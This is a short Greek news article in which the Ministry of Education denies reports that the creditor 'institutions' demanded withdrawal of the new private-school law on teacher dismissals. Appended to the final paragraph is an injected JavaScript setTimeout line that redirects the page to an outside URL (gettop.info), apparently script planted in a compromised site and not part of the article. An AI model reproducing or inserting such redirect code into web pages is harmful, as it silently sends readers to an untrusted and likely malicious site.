Υπ.Παιδείας: Ο νόμος για τα ιδιωτικά σχολεία θα εφαρμοστεί κανονικά

0
5

 

Το υπουργείο Παιδείας διαψεύδει κατηγορηματικά την πληροφορία ότι οι θεσμοί ζήτησαν την απόσυρση του νόμου για την ιδιωτική εκπαίδευση.

Όπως τονίζεται χαρακτηριστικά στην ανακοίνωση, οι σχετικές ρυθμίσεις θα εφαρμοστούν κανονικά, ενώ το υπουργείο Παιδείας σημειώνει ότι «τα γνωστά συμφέροντα στο χώρο της ιδιωτικής εκπαίδευσης, διακινούν στα ΜΜΕ την “πληροφορία”, ότι, οι εκπρόσωποι των Θεσμών κατά τη σημερινή συνάντησή τους με τον υπουργό Παιδείας Νίκο Φίλη, απαίτησαν την απόσυρση των πρόσφατα ψηφισμένων ρυθμίσεων για την ιδιωτική εκπαίδευση. Ουδέν αναληθέστερον».

Οι πληροφορίες ήθελαν τους εκπροσώπους των θεσμών, στη συνάντηση που είχαν με τον υπουργό Παιδείας Νίκο Φίλη, να ζητούν την απόσυρση των διατάξεων σχετικά με τις μη αιτιολογημένες απολύσεις των εκπαιδευτικών της ιδιωτικής εκπαίδευσης. Σύμφωνα με δημοσιεύματα, οι θεσμοί ζήτησαν την απόσυρση των επίμαχων διατάξεων θεωρώντας ότι δημιουργούν «δεδικασμένο» γενικότερα για τις απολύσεις στον ιδιωτικό τομέα. setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here